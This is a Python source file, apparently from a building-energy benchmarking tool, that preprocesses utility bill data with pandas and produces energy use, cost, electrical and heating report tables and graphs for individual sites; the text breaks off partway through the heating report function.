#*****************************************************************************
# ----------------------Function for Preprocessing Data ----------------------
def preprocess_data():
"""Loads and processes the Utility Bill data into a smaller and more usable
form. Returns
- a DataFrame with the raw billing data,
- a DataFrame with the preprocessed data,
- and a bench_util.Util object, which provides useful functions to
the analysis portion of this script.
This the "preprocess_data.ipynb" was used to develop this code and shows
intermdediate results from each of the steps.
"""
# --- Read the CSV file and convert the billing period dates into
# real Pandas dates
fn = settings.UTILITY_BILL_FILE_PATH
msg('Starting to read Utility Bill Data File.')
dfu = pd.read_csv(fn,
parse_dates=['From', 'Thru'],
dtype={'Site ID': 'object', 'Account Number': 'object'}
)
msg('Removing Unneeded columns and Combining Charges.')
# Filter down to the needed columns and rename them
cols = [
('Site ID', 'site_id'),
('From', 'from_dt'),
('Thru', 'thru_dt'),
('Service Name', 'service_type'),
('Item Description', 'item_desc'),
('Usage', 'usage'),
('Cost', 'cost'),
('Units', 'units'),
]
old_cols, new_cols = zip(*cols) # unpack into old and new column names
    dfu1 = dfu[list(old_cols)].copy() # select just those columns from the original dataframe
dfu1.columns = new_cols # rename the columns
    # --- Collapse Non-Usage Charges into "Other Charge"
# This cuts the processing time in half due to not having to split a whole
# bunch of non-consumption charges.
dfu1.loc[np.isnan(dfu1.usage), 'item_desc'] = 'Other Charge'
# Pandas can't do a GroupBy on NaNs, so replace with something
dfu1.units.fillna('-', inplace=True)
dfu1 = dfu1.groupby(['site_id',
'from_dt',
'thru_dt',
'service_type',
'item_desc',
'units']).sum()
dfu1.reset_index(inplace=True)
# --- Split Each Bill into Multiple Pieces, each within one Calendar Month
msg('Split Bills into Calendar Month Pieces.')
# Split all the rows into calendar month pieces and make a new DataFrame
recs=[]
for ix, row in dfu1.iterrows():
# it is *much* faster to modify a dictionary than a Pandas series
row_tmpl = row.to_dict()
        # Pull out start and end of billing period; the from & thru dates can be
        # dropped now that the billing period is being split across months.
st = row_tmpl['from_dt']
en = row_tmpl['thru_dt']
del row_tmpl['from_dt']
del row_tmpl['thru_dt']
for piece in bu.split_period(st, en):
new_row = row_tmpl.copy()
new_row['cal_year'] = piece.cal_year
new_row['cal_mo'] = piece.cal_mo
# new_row['days_served'] = piece.days_served # not really needed
new_row['usage'] *= piece.bill_frac
new_row['cost'] *= piece.bill_frac
recs.append(new_row)
dfu2 = pd.DataFrame(recs, index=range(len(recs)))
# --- Sum Up the Pieces by Month
dfu3 = dfu2.groupby(
['site_id', 'service_type', 'cal_year', 'cal_mo', 'item_desc', 'units']
).sum()
dfu3 = dfu3.reset_index()
#--- Make a utility function object
msg('Make an Object containing Useful Utility Functions.')
dn = settings.OTHER_DATA_DIR_PATH
ut = bu.Util(dfu, dn)
    # --- Add MMBtus and Fiscal Year Info
msg('Add MMBtu Information.')
mmbtu = []
for ix, row in dfu3.iterrows():
row_mmbtu = ut.fuel_btus_per_unit(row.service_type, row.units) * row.usage / 1e6
if np.isnan(row_mmbtu): row_mmbtu = 0.0
mmbtu.append(row_mmbtu)
dfu3['mmbtu'] = mmbtu
# Now that original service types have been used to determine MMBtus,
# convert all service types to standard service types.
dfu3['service_type'] = dfu3.service_type.map(ut.service_to_category())
# This may cause multiple rows for a fiscal month and service type.
# Re-sum to reduce to least number of rows.
dfu4 = dfu3.groupby(
['site_id', 'service_type', 'cal_year', 'cal_mo', 'item_desc', 'units']
).sum()
dfu4 = dfu4.reset_index()
# Add the fiscal year information
msg('Add Fiscal Year Information.')
fyr = []
fmo = []
for cyr, cmo in zip(dfu4.cal_year, dfu4.cal_mo):
fis_yr, fis_mo = bu.calendar_to_fiscal(cyr, cmo)
fyr.append(fis_yr)
fmo.append(fis_mo)
dfu4['fiscal_year'] = fyr
dfu4['fiscal_mo'] = fmo
msg('Preprocessing complete!')
return dfu, dfu4, ut
#******************************************************************************
#******************************************************************************
# --------- Functions That Produce Reports for One Site ----------
""" Each of these functions returns, at a minimum, a dictionary containing
data for the report template.
The functions frequently have some or all of the following input parameters, which
are documented here:
Input parameters:
site: The Site ID of the site to analyze.
df: The preprocessed Pandas DataFrame of Utility Bill information.
ut: The bench_util.Util object that provides additional site data
needed in the benchmarking process.
The functions all save the required graphs for their respective reports to the
directory determined in the graph_util.graph_filename_url() function.
"""
# --------------------- Building Information Report -----------------------
def building_info_report(site, ut, report_date_time):
"""
'report_date_time' is a string giving the date/time this benchmarking
script was run.
"""
# This function returns all the needed info for the report, except
# the date updated
info = ut.building_info(site)
return dict(
building_info = dict(
date_updated = report_date_time,
bldg = info
)
)
# -------------------------- Energy Index Report ----------------------------
def energy_index_report(site, df, ut):
"""As well as returning template data, this function writes a spreadsheet
that summarizes values for every building. The spreadsheet is written to
'output/extra_data/site_summary_FYYYYY.xlsx'.
"""
# Start a dictionary with the main key to hold the template data
template_data = {'energy_index_comparison': {}}
# --------- Table 1, Yearly Table
# Filter down to just this site's bills and only services that
# are energy services.
energy_services = bu.missing_energy_services([])
df1 = df.query('site_id==@site and service_type==@energy_services')
# Only do this table if there are energy services.
if not df1.empty:
# Sum Energy Costs and Usage
df2 = pd.pivot_table(df1, index='fiscal_year', values=['cost', 'mmbtu'], aggfunc=np.sum)
# Add a column showing number of months present in each fiscal year.
bu.add_month_count_column(df2, df1)
# Make a column with just the Heat MMBtu
dfe = df1.query("service_type=='electricity'").groupby('fiscal_year').sum()[['mmbtu']]
dfe.rename(columns={'mmbtu': 'elec_mmbtu'}, inplace = True)
df2 = df2.merge(dfe, how='left', left_index=True, right_index=True)
df2['elec_mmbtu'] = df2['elec_mmbtu'].fillna(0.0)
df2['heat_mmbtu'] = df2.mmbtu - df2.elec_mmbtu
# Add in degree days to DataFrame
months_present = bu.months_present(df1)
deg_days = ut.degree_days_yearly(months_present, site)
df2['hdd'] = deg_days
# Get building square footage and calculate EUIs and ECI.
sq_ft = ut.building_info(site)['sq_ft']
df2['eui'] = df2.mmbtu * 1e3 / sq_ft
df2['eci'] = df2.cost / sq_ft
df2['specific_eui'] = df2.heat_mmbtu * 1e6 / df2.hdd / sq_ft
# Restrict to full years
df2 = df2.query("month_count == 12").copy()
# Reverse the years
df2.sort_index(ascending=False, inplace=True)
# get the rows as a list of dictionaries and put into
# final template data dictionary.
template_data['energy_index_comparison']['yearly_table'] = {
'rows': bu.df_to_dictionaries(df2)
}
# ---------- Table 2, Details Table
# Use the last complete year for this site as the year for the Details
# table. If there was no complete year for the site, then use the
# last complete year for the entire dataset.
if 'df2' in locals() and len(df2):
last_complete_year = df2.index.max()
else:
# Determine month count by year for Electricity in entire dataset
# to determine the latest complete year.
electric_only = df.query("service_type == 'electricity'")
electric_months_present = bu.months_present(electric_only)
electric_mo_count = bu.month_count(electric_months_present)
last_complete_year = max(electric_mo_count[electric_mo_count==12].index)
# Filter down to just the records of the targeted fiscal year
df1 = df.query('fiscal_year == @last_complete_year')
# Get Total Utility cost by building. This includes non-energy utilities as well.
df2 = df1.pivot_table(index='site_id', values=['cost'], aggfunc=np.sum)
df2.columns = ['total_cost']
# Save this into the Final DataFrame that we will build up as we go.
df_final = df2.copy()
# Get a list of the Energy Services and restrict the data to
# just these services
energy_svcs = bu.missing_energy_services([])
df2 = df1.query('service_type == @energy_svcs')
# Summarize Cost by Service Type
df3 = pd.pivot_table(df2, index='site_id', columns='service_type', values='cost', aggfunc=np.sum)
# Add in any missing columns
bu.add_missing_columns(df3, energy_svcs)
# Change column names
cols = ['{}_cost'.format(col) for col in df3.columns]
df3.columns = cols
# Add a total energy cost column
df3['total_energy_cost'] = df3.sum(axis=1)
# Add a total Heat Cost Column
df3['total_heat_cost'] = df3.total_energy_cost.fillna(0.0) - df3.electricity_cost.fillna(0.0)
# Add this to the final DataFrame
df_final = pd.concat([df_final, df3], axis=1, sort=True)
# Summarize MMBtu by Service Type
df3 = pd.pivot_table(df2, index='site_id', columns='service_type', values='mmbtu', aggfunc=np.sum)
# Add in any missing columns
bu.add_missing_columns(df3, energy_svcs)
# Change column names
cols = ['{}_mmbtu'.format(col) for col in df3.columns]
df3.columns = cols
# Add a total mmbtu column
df3['total_mmbtu'] = df3.sum(axis=1)
# Add a total Heat mmbtu Column
df3['total_heat_mmbtu'] = df3.total_mmbtu.fillna(0.0) - df3.electricity_mmbtu.fillna(0.0)
# Add this to the final DataFrame
df_final = pd.concat([df_final, df3], axis=1, sort=True)
# Electricity kWh summed by building
df3 = pd.pivot_table(df2.query('units == "kWh"'), index='site_id', values='usage', aggfunc=np.sum)
df3.columns = ['electricity_kwh']
# Include in Final DF
df_final = pd.concat([df_final, df3], axis=1, sort=True)
# Electricity kW, both Average and Max by building
# First, sum up kW pieces for each month.
df3 = df2.query('units == "kW"').groupby(['site_id', 'fiscal_year', 'fiscal_mo']).sum()
df3 = pd.pivot_table(df3.reset_index(), index='site_id', values='usage', aggfunc=[np.mean, np.max])
df3.columns = ['electricity_kw_average', 'electricity_kw_max']
# Add into Final Frame
df_final = pd.concat([df_final, df3], axis=1, sort=True)
# Add in Square footage info
df_bldg = ut.building_info_df()[['sq_ft']]
# Add into Final Frame. I do a merge here so as not to bring
# in buildings from the building info spreadsheet that are not in this
# dataset; this dataset has been restricted to one year.
df_final = pd.merge(df_final, df_bldg, how='left', left_index=True, right_index=True)
# Build a DataFrame that has monthly degree days for each site/year/month
# combination.
combos = set(zip(df1.site_id, df1.fiscal_year, df1.fiscal_mo))
df_dd = pd.DataFrame(data=list(combos), columns=['site_id', 'fiscal_year', 'fiscal_mo'])
ut.add_degree_days_col(df_dd)
# Add up the degree days by site (we've already filtered down to one year or less
# of data.)
dd_series = df_dd.groupby('site_id').sum()['degree_days']
# Put in final DataFrame
df_final = pd.concat([df_final, dd_series], axis=1)
# Add in a column that gives the number of months present for each site
# in this year. Then filter down to just the sites that have 12 months
# of data.
df_final.reset_index(inplace=True)
df_final['fiscal_year'] = last_complete_year
df_final.set_index(['site_id', 'fiscal_year'], inplace=True)
df_final = bu.add_month_count_column_by_site(df_final, df2)
df_final = df_final.query('month_count==12').copy()
df_final.reset_index(inplace=True)
df_final.set_index('site_id', inplace=True)
# Calculate per square foot values for each building.
df_final['eui'] = df_final.total_mmbtu * 1e3 / df_final.sq_ft
df_final['eci'] = df_final.total_energy_cost / df_final.sq_ft
df_final['specific_eui'] = df_final.total_heat_mmbtu * 1e6 / df_final.sq_ft / df_final.degree_days
# Save this to a spreadsheet, if it has not already been saved
fn = 'output/extra_data/site_summary_FY{}.xlsx'.format(last_complete_year)
if not os.path.exists(fn):
excel_writer = pd.ExcelWriter(fn)
df_final.to_excel(excel_writer, sheet_name='Sites')
# Get the totals across all buildings
totals_all_bldgs = df_final.sum()
# Total Degree-Days are not relevant
totals_all_bldgs.drop(['degree_days'], inplace=True)
# Only use the set of buildings that have some energy use and non-zero
# square footage to determine EUI's and ECI's
energy_bldgs = df_final.query("total_mmbtu > 0 and sq_ft > 0")
# Get total square feet, energy use, and energy cost for these buildings
# and calculate EUI and ECI
sq_ft_energy_bldgs = energy_bldgs.sq_ft.sum()
energy_in_energy_bldgs = energy_bldgs.total_mmbtu.sum()
energy_cost_in_energy_bldgs = energy_bldgs.total_energy_cost.sum()
totals_all_bldgs['eui'] = energy_in_energy_bldgs * 1e3 / sq_ft_energy_bldgs
totals_all_bldgs['eci'] = energy_cost_in_energy_bldgs / sq_ft_energy_bldgs
# For calculating heating specific EUI, further filter the set of
# buildings down to those that have heating fuel use.
# Get separate square footage total and weighted average degree-day for these.
heat_bldgs = energy_bldgs.query("total_heat_mmbtu > 0")
heat_bldgs_sq_ft = heat_bldgs.sq_ft.sum()
heat_bldgs_heat_mmbtu = heat_bldgs.total_heat_mmbtu.sum()
heat_bldgs_degree_days = (heat_bldgs.total_heat_mmbtu * heat_bldgs.degree_days).sum() / heat_bldgs.total_heat_mmbtu.sum()
totals_all_bldgs['specific_eui'] = heat_bldgs_heat_mmbtu * 1e6 / heat_bldgs_sq_ft / heat_bldgs_degree_days
# calculate a rank DataFrame
df_rank = pd.DataFrame()
for col in df_final.columns:
df_rank[col] = df_final[col].rank(ascending=False)
if site in df_final.index:
# The site exists in the DataFrame
site_info = df_final.loc[site]
site_pct = site_info / totals_all_bldgs
site_rank = df_rank.loc[site]
else:
        # Site is not there, probably because it is not present in this year.
# Make variables with NaN values for all elements.
site_info = df_final.iloc[0].copy() # Just grab the first row to start with
        site_info[:] = np.NaN # Put NaN in every element
site_pct = site_info.copy()
site_rank = site_info.copy()
    # Make a final dictionary to hold all the results for this table
tbl2_data = {
'fiscal_year': 'FY {}'.format(last_complete_year),
'bldg': site_info.to_dict(),
'all': totals_all_bldgs.to_dict(),
'pct': site_pct.to_dict(),
'rank': site_rank.to_dict()
}
template_data['energy_index_comparison']['details_table'] = tbl2_data
# -------------- Energy Comparison Graphs ---------------
# Filter down to only services that are energy services.
energy_services = bu.missing_energy_services([])
df4 = df.query('service_type==@energy_services').copy()
# Sum Energy Costs and Usage
df5 = pd.pivot_table(df4, index=['site_id', 'fiscal_year'], values=['cost', 'mmbtu'], aggfunc=np.sum)
# Add a column showing number of months present in each fiscal year.
df5 = bu.add_month_count_column_by_site(df5, df4)
# Create an Electric MMBtu column so it can be subtracted from total to determine
# Heat MMBtu.
    dfe = df4.query("service_type=='electricity'").groupby(['site_id', 'fiscal_year']).sum()[['mmbtu']]
dfe.rename(columns={'mmbtu': 'elec_mmbtu'}, inplace = True)
df5 = df5.merge(dfe, how='left', left_index=True, right_index=True)
df5['elec_mmbtu'] = df5['elec_mmbtu'].fillna(0.0)
df5['heat_mmbtu'] = df5.mmbtu - df5.elec_mmbtu
# Add in degree-days:
# Create a DataFrame with site, year, month and degree-days, but only one row
# for each site/year/month combo.
dfd = df4[['site_id', 'fiscal_year', 'fiscal_mo']].copy()
dfd.drop_duplicates(inplace=True)
ut.add_degree_days_col(dfd)
# Use the agg function below so that a NaN will be returned for the year
# if any monthly values are NaN
dfd = dfd.groupby(['site_id', 'fiscal_year']).agg({'degree_days': lambda x: np.sum(x.values)})[['degree_days']]
df5 = df5.merge(dfd, how='left', left_index=True, right_index=True)
# Add in some needed building info like square footage, primary function
# and building category.
df_bldg = ut.building_info_df()
# Shrink to just the needed fields and remove index.
# Also, fill blank values with 'Unknown'.
df_info = df_bldg[['sq_ft', 'site_category', 'primary_func']].copy().reset_index()
df_info['site_category'] = df_info.site_category.fillna('Unknown')
df_info['primary_func'] = df_info.primary_func.fillna('Unknown Type')
# Also Remove the index from df5 and merge in building info
df5.reset_index(inplace=True)
df5 = df5.merge(df_info, how='left')
# Now calculate per square foot energy measures
df5['eui'] = df5.mmbtu * 1e3 / df5.sq_ft
df5['eci'] = df5.cost / df5.sq_ft
df5['specific_eui'] = df5.heat_mmbtu * 1e6 / df5.degree_days / df5.sq_ft
# Restrict to full years
df5 = df5.query("month_count == 12").copy()
# Make all of the comparison graphs
g1_fn, g1_url = gu.graph_filename_url(site, 'eci_func')
gu.building_type_comparison_graph(df5, 'eci', site, g1_fn)
g2_fn, g2_url = gu.graph_filename_url(site, 'eci_owner')
gu.building_owner_comparison_graph(df5, 'eci', site, g2_fn)
g3_fn, g3_url = gu.graph_filename_url(site, 'eui_func')
gu.building_type_comparison_graph(df5, 'eui', site, g3_fn)
g4_fn, g4_url = gu.graph_filename_url(site, 'eui_owner')
gu.building_owner_comparison_graph(df5, 'eui', site, g4_fn)
g5_fn, g5_url = gu.graph_filename_url(site, 'speui_func')
gu.building_type_comparison_graph(df5, 'specific_eui', site, g5_fn)
g6_fn, g6_url = gu.graph_filename_url(site, 'speui_owner')
gu.building_owner_comparison_graph(df5, 'specific_eui', site, g6_fn)
template_data['energy_index_comparison']['graphs'] = [
g1_url, g2_url, g3_url, g4_url, g5_url, g6_url
]
return template_data
# ------------------ Utility Cost Overview Report ----------------------
def utility_cost_report(site, df, ut):
"""As well as return the template data, this function returns a utility cost
DataFrame that is needed in the Heating Cost Analysis Report.
"""
# From the main DataFrame, get only the rows for this site, and only get
# the needed columns for this analysis
df1 = df.query('site_id == @site')[['service_type', 'fiscal_year', 'fiscal_mo', 'cost']]
# Summarize cost by fiscal year and service type.
df2 = pd.pivot_table(
df1,
values='cost',
index=['fiscal_year'],
columns=['service_type'],
aggfunc=np.sum
)
# Add in columns for the missing services
missing_services = bu.missing_services(df2.columns)
bu.add_columns(df2, missing_services)
# Add a Total column that sums the other columns
df2['total'] = df2.sum(axis=1)
# Add a percent change column
df2['pct_change'] = df2.total.pct_change()
# Add in degree days
months_present = bu.months_present(df1)
deg_days = ut.degree_days_yearly(months_present, site)
df2['hdd'] = deg_days
# Add in a column to show the numbers of months present for each year
# This will help to identify partial years.
bu.add_month_count_column(df2, df1)
# trim out the partial years
if len(df2):
df2 = df2.query("month_count == 12").copy()
# Reverse the DataFrame
df2.sort_index(ascending=False, inplace=True)
# Reset the index so the fiscal year column can be passed to the graphing utility
reset_df2 = df2.reset_index()
# Save a copy of this DataFrame to return for use in the
# Heating Cost Analysis Report
df_utility_cost = reset_df2.copy()
# Get appropriate file names and URLs for the graph
g1_fn, g1_url = gu.graph_filename_url(site, 'util_cost_ovw_g1')
# make the area cost distribution graph
utility_list = bu.all_services.copy()
gu.area_cost_distribution(reset_df2, 'fiscal_year', utility_list, g1_fn);
# make the stacked bar graph
g2_fn, g2_url = gu.graph_filename_url(site, 'util_cost_ovw_g2')
gu.create_stacked_bar(reset_df2, 'fiscal_year', utility_list, 'Utility Cost ($)', "Annual Cost by Utility Type",g2_fn)
# Put results into the final dictionary that will be passed to the Template.
# A function is used to convert the DataFrame into a list of dictionaries.
template_data = dict(
utility_cost_overview = dict(
graphs=[g1_url, g2_url],
table={'rows': bu.df_to_dictionaries(df2)}
)
)
return template_data, df_utility_cost
# -------------------- Energy Use and Cost Reports -----------------------
def energy_use_cost_reports(site, df, ut, df_utility_cost):
"""This does both the Energy Usage report and the Energy Cost & Usage
Pie charts.
'df_utility_cost' is a summary utility cost DataFrame from the prior
function.
    As well as returning the template data, this function returns a summary
    energy usage DataFrame.
"""
# From the main DataFrame, get only the rows for this site, and only get
# the needed columns for this analysis
usage_df1 = df.query('site_id == @site')[['service_type', 'fiscal_year', 'fiscal_mo', 'mmbtu']]
# Total mmbtu by service type and year.
usage_df2 = pd.pivot_table(
usage_df1,
values='mmbtu',
index=['fiscal_year'],
columns=['service_type'],
aggfunc=np.sum
)
# drop non-energy columns
    non_energy_services = list(set(bu.all_services) - set(bu.all_energy_services))
    usage_df2 = usage_df2[usage_df2.columns.difference(non_energy_services)]
# Add in columns for the missing services
missing_services = bu.missing_energy_services(usage_df2.columns)
bu.add_columns(usage_df2, missing_services)
# Add a Total column that sums the other columns
usage_df2['total_energy'] = usage_df2.sum(axis=1)
cols = ['{}_mmbtu'.format(col) for col in usage_df2.columns]
usage_df2.columns = cols
# Create a list of columns to loop through and calculate percent total energy
usage_cols = list(usage_df2.columns.values)
usage_cols.remove('total_energy_mmbtu')
for col in usage_cols:
col_name = col.split('_mmbtu')[0] + "_pct"
usage_df2[col_name] = usage_df2[col] / usage_df2.total_energy_mmbtu
# Add in degree days
months_present = bu.months_present(usage_df1)
deg_days = ut.degree_days_yearly(months_present, site)
usage_df2['hdd'] = deg_days
# Add in a column to show the numbers of months present for each year
# This will help to identify partial years.
mo_count = bu.month_count(months_present)
usage_df2['month_count'] = mo_count
# Calculate total heat energy and normalized heating usage
usage_df2['total_heat_mmbtu'] = usage_df2.total_energy_mmbtu - usage_df2.electricity_mmbtu
usage_df2['total_specific_heat'] = usage_df2.total_heat_mmbtu * 1000 / usage_df2.hdd
usage_df2 = usage_df2.query("month_count == 12").copy()
# Reverse the DataFrame
usage_df2.sort_index(ascending=False, inplace=True)
usage_df2 = usage_df2.drop('month_count', axis=1)
# --- Create Energy Usage Overview Graphs
# Reset the index so the fiscal year column can be passed to the graphing function
reset_usage_df2 = usage_df2.reset_index()
p4g2_filename, p4g2_url = gu.graph_filename_url(site, 'energy_usage_ovw_g2')
# Create the area graph
gu.area_use_distribution(reset_usage_df2, 'fiscal_year', usage_cols, p4g2_filename)
# The stacked bar graph
p4g1_filename, p4g1_url = gu.graph_filename_url(site, 'energy_usage_ovw_g1')
gu.energy_use_stacked_bar(reset_usage_df2, 'fiscal_year', usage_cols, p4g1_filename)
# Convert df to dictionary
energy_use_overview_rows = bu.df_to_dictionaries(usage_df2)
# Put data and graphs into a dictionary
template_data = dict(
energy_usage_overview = dict(
graphs=[p4g1_url, p4g2_url],
table={'rows': energy_use_overview_rows}
)
)
# Make a utility list to include only energy-related columns
utility_list = bu.all_energy_services.copy()
pie_urls = gu.usage_pie_charts(usage_df2.fillna(0.0), usage_cols, 1, 'energy_usage_pie', site)
# Make the other graphs and append the URLs
df_ut_cost = df_utility_cost.set_index('fiscal_year') # need fiscal_year index for graphs
pie_urls += gu.usage_pie_charts(df_ut_cost.fillna(0.0),
utility_list,
2,
'energy_cost_pie',
site)
# Add pie charts to template dictionary
template_data['energy_cost_usage'] = dict(graphs=pie_urls)
return template_data, usage_df2
# -------------------- Electrical Usage and Cost Reports -------------------------
def electrical_usage_and_cost_reports(site, df):
"""This does both the Electrical Usage and Electrical
Cost reports."""
site_df = df.query("site_id == @site")
electric_df = site_df.query("units == 'kWh' or units == 'kW'")
if 'electricity' in site_df.service_type.unique() and site_df.query("service_type == 'electricity'")['usage'].sum(axis=0) > 0:
        # only look at electricity records
electric_pivot_monthly = pd.pivot_table(electric_df,
index=['fiscal_year', 'fiscal_mo'],
columns=['units'],
values='usage',
aggfunc=np.sum)
else:
# Create an empty dataframe with the correct index
electric_pivot_monthly = site_df.groupby(['fiscal_year', 'fiscal_mo']).mean()[[]]
# Add in missing electricity columns and fill them with zeros
electric_pivot_monthly = bu.add_missing_columns(electric_pivot_monthly, ['kWh', 'kW'])
    electric_pivot_monthly['kW'] = electric_pivot_monthly.kW.fillna(0.0)
    electric_pivot_monthly['kWh'] = electric_pivot_monthly.kWh.fillna(0.0)
    # Do a month count for the electricity bills
elec_months_present = bu.months_present(electric_pivot_monthly.reset_index())
elec_mo_count = bu.month_count(elec_months_present)
elec_mo_count_df = pd.DataFrame(elec_mo_count)
elec_mo_count_df.index.name = 'fiscal_year'
if 'kWh' in site_df.units.unique() or 'kW' in site_df.units.unique():
electric_pivot_annual = pd.pivot_table(electric_df,
index=['fiscal_year'],
columns=['units'],
values='usage',
aggfunc=np.sum
)
else:
# Create an empty dataframe with the correct index
electric_pivot_annual = site_df.groupby(['fiscal_year']).mean()[[]]
electric_pivot_annual = bu.add_missing_columns(electric_pivot_annual, ['kWh', 'kW'])
electric_use_annual = electric_pivot_annual[['kWh']]
electric_use_annual = electric_use_annual.rename(columns={'kWh':'ann_electric_usage_kWh'})
# Get average annual demand usage
electric_demand_avg = electric_pivot_monthly.groupby(['fiscal_year']).mean()
electric_demand_avg = electric_demand_avg[['kW']]
electric_demand_avg = electric_demand_avg.rename(columns={'kW': 'avg_demand_kW'})
# Find annual maximum demand usage
electric_demand_max = electric_pivot_monthly.groupby(['fiscal_year']).max()
electric_demand_max = electric_demand_max[['kW']]
electric_demand_max = electric_demand_max.rename(columns={'kW': 'max_demand_kW'})
# Combine dataframes
electric_demand_join = pd.merge(electric_demand_max, electric_demand_avg, how='outer', left_index=True, right_index=True)
annual_electric_data = pd.merge(electric_demand_join, electric_use_annual, how='outer', left_index=True, right_index=True)
# Add percent change columns
annual_electric_data['usage_pct_change'] = annual_electric_data.ann_electric_usage_kWh.pct_change()
annual_electric_data['avg_demand_pct_change'] = annual_electric_data.avg_demand_kW.pct_change()
annual_electric_data['max_demand_pct_change'] = annual_electric_data.max_demand_kW.pct_change()
annual_electric_data = annual_electric_data.rename(columns={'avg_demand_kW': 'Average kW',
'ann_electric_usage_kWh': 'Total kWh'})
annual_electric_data = pd.merge(annual_electric_data, elec_mo_count_df, left_index=True, right_index=True, how='left')
annual_electric_data = annual_electric_data.query("month == 12")
annual_electric_data = annual_electric_data.sort_index(ascending=False)
annual_electric_data = annual_electric_data.rename(columns={'max_demand_kW':'kw_max',
'Average kW':'kw_avg',
'Total kWh':'kwh',
'usage_pct_change':'kwh_pct_change',
'avg_demand_pct_change':'kw_avg_pct_change',
'max_demand_pct_change':'kw_max_pct_change'})
annual_electric_data = annual_electric_data.drop('month', axis=1)
# ---- Create Electrical Usage Analysis Graphs - Page 6
# Axes labels
ylabel1 = 'Electricity Usage [kWh]'
ylabel2 = 'Electricity Demand [kW]'
p6g1_filename, p6g1_url = gu.graph_filename_url(site, "electricity_usage_g1")
gu.stacked_bar_with_line(annual_electric_data.reset_index(), 'fiscal_year', ['kwh'], 'kw_avg',
ylabel1, ylabel2, "Annual Electricity Usage and Demand", p6g1_filename)
p6g2_filename, p6g2_url = gu.graph_filename_url(site, "electricity_usage_g2")
gu.create_monthly_profile(electric_pivot_monthly, 'kWh', 'Monthly Electricity Usage Profile [kWh]', 'blue',
"Monthly Electricity Usage Profile by Fiscal Year",p6g2_filename)
# Convert df to dictionary
electric_use_rows = bu.df_to_dictionaries(annual_electric_data)
# Put data and graphs in a dictionary
template_data = dict(
electrical_usage_analysis = dict(
graphs=[p6g1_url, p6g2_url],
table={'rows': electric_use_rows}
)
)
    # only look at electricity records
electric_cost_df = site_df.query("service_type == 'electricity'").copy()
# Costs don't always have units, so split the data into demand charges and usage charges (which includes other charges)
electric_cost_df['cost_categories'] = np.where(electric_cost_df.item_desc.isin(['KW Charge', 'On peak demand', 'Demand Charge']),
'demand_cost', 'usage_cost')
if 'electricity' in site_df.service_type.unique():
# Sum costs by demand and usage
electric_annual_cost = pd.pivot_table(electric_cost_df,
index=['fiscal_year'],
columns=['cost_categories'],
values='cost',
aggfunc=np.sum
)
else:
electric_annual_cost = site_df.groupby(['fiscal_year']).mean()[[]]
electric_annual_cost = bu.add_missing_columns(electric_annual_cost, ['demand_cost', 'usage_cost'] ,0.0)
# Create a total column
electric_annual_cost['Total Cost'] = electric_annual_cost[['demand_cost', 'usage_cost']].sum(axis=1)
# Add percent change columns
electric_annual_cost['usage_cost_pct_change'] = electric_annual_cost.usage_cost.pct_change()
electric_annual_cost['demand_cost_pct_change'] = electric_annual_cost.demand_cost.pct_change()
electric_annual_cost['total_cost_pct_change'] = electric_annual_cost['Total Cost'].pct_change()
# Left join the cost data to the annual electric data, which only shows complete years
electric_use_and_cost = pd.merge(annual_electric_data, electric_annual_cost, left_index=True, right_index=True, how='left')
electric_use_and_cost = electric_use_and_cost.sort_index(ascending=False)
electric_use_and_cost = electric_use_and_cost.drop(['kw_max', 'kw_max_pct_change'], axis=1)
electric_use_and_cost = electric_use_and_cost.rename(columns={'demand_cost':'kw_avg_cost',
'usage_cost':'kwh_cost',
'Total Cost':'total_cost',
'usage_cost_pct_change':'kwh_cost_pct_change',
'demand_cost_pct_change':'kw_avg_cost_pct_change'
})
# --- Create Electrical Cost Analysis Graphs
p7g1_filename, p7g1_url = gu.graph_filename_url(site, "electrical_cost_g1")
renamed_use_and_cost = electric_use_and_cost.rename(columns={'kwh_cost':'Electricity Usage Cost [$]',
'kw_avg_cost':'Electricity Demand Cost [$]'})
gu.create_stacked_bar(renamed_use_and_cost.reset_index(), 'fiscal_year', ['Electricity Usage Cost [$]',
'Electricity Demand Cost [$]'],
'Electricity Cost [$]', "Annual Electricity Usage and Demand Costs", p7g1_filename)
# Create Monthly Profile of Electricity Demand
p7g2_filename, p7g2_url = gu.graph_filename_url(site, "electrical_cost_g2")
gu.create_monthly_profile(electric_pivot_monthly, 'kW', 'Monthly Electricity Demand Profile [kW]', 'blue',
"Monthly Electricity Demand Profile by Fiscal Year",p7g2_filename)
# Convert df to dictionary
electric_cost_rows = bu.df_to_dictionaries(electric_use_and_cost)
# Add data and graphs to main dictionary
template_data['electrical_cost_analysis'] = dict(
graphs=[p7g1_url, p7g2_url],
table={'rows': electric_cost_rows},
)
return template_data
# --------------------Heating Usage and Cost Reports ------------------------
def heating_usage_cost_reports(site, df, ut, df_utility_cost, df_usage):
'''This produces both the Heating Usage and the Heating Cost
reports.
'df_utility_cost': The utility cost DataFrame produced in the
utility_cost_report function above.
'df_usage': A summary energy usage DataFrame produced in the prior
energy_use_cost_reports function.
'''
# Abort if no heating usage
if df_usage.empty:
return {}
heat_service_mmbtu_list = []
for heat_service in bu.all_heat_services:
heat_service_mmbtu_list.append(heat_service + '_mmbtu')
keep_cols_list = heat_service_mmbtu_list + ['hdd', 'total_heat_mmbtu']
heating_usage = df_usage[keep_cols_list].copy()
# Add in percent change columns
# First sort so the percent change column is correct and then re-sort the other direction
heating_usage.sort_index(ascending=True, inplace=True)
for heating_service in heat_service_mmbtu_list:
new_col_name = heating_service.split('_mmbtu')[0] + '_pct_change'
heating_usage[new_col_name] = heating_usage[heating_service].pct_change()
heating_usage['total_heat_pct_change'] = heating_usage.total_heat_mmbtu.pct_change()
# Now reset the sorting
heating_usage.sort_index(ascending=False, inplace=True)
# Get the number of gallons, ccf, and cords of wood by converting MMBTUs using the supplied conversions
# This is hard-coded because I couldn't figure out how to do it more generically
heating_usage['fuel_oil_usage'] = heating_usage.fuel_oil_mmbtu * 1000000 / ut.service_category_info('fuel_oil')[1]
heating_usage['natural_gas_usage'] = heating_usage.natural_gas_mmbtu * 1000000 / ut.service_category_info('natural_gas')[1]
heating_usage['propane_usage'] = heating_usage.propane_mmbtu * 1000000 / ut.service_category_info('propane')[1]
heating_usage['wood_usage'] = heating_usage.wood_mmbtu * 1000000 / ut.service_category_info('wood')[1]
heating_usage['coal_usage'] = heating_usage.coal_mmbtu * 1000000 / ut.service_category_info('coal')[1]
# ----- Create Heating Usage Analysis Graphs
p8g1_filename, p8g1_url = gu.graph_filename_url(site, "heating_usage_g1")
gu.stacked_bar_with_line(heating_usage.reset_index(), 'fiscal_year', heat_service_mmbtu_list, 'hdd',
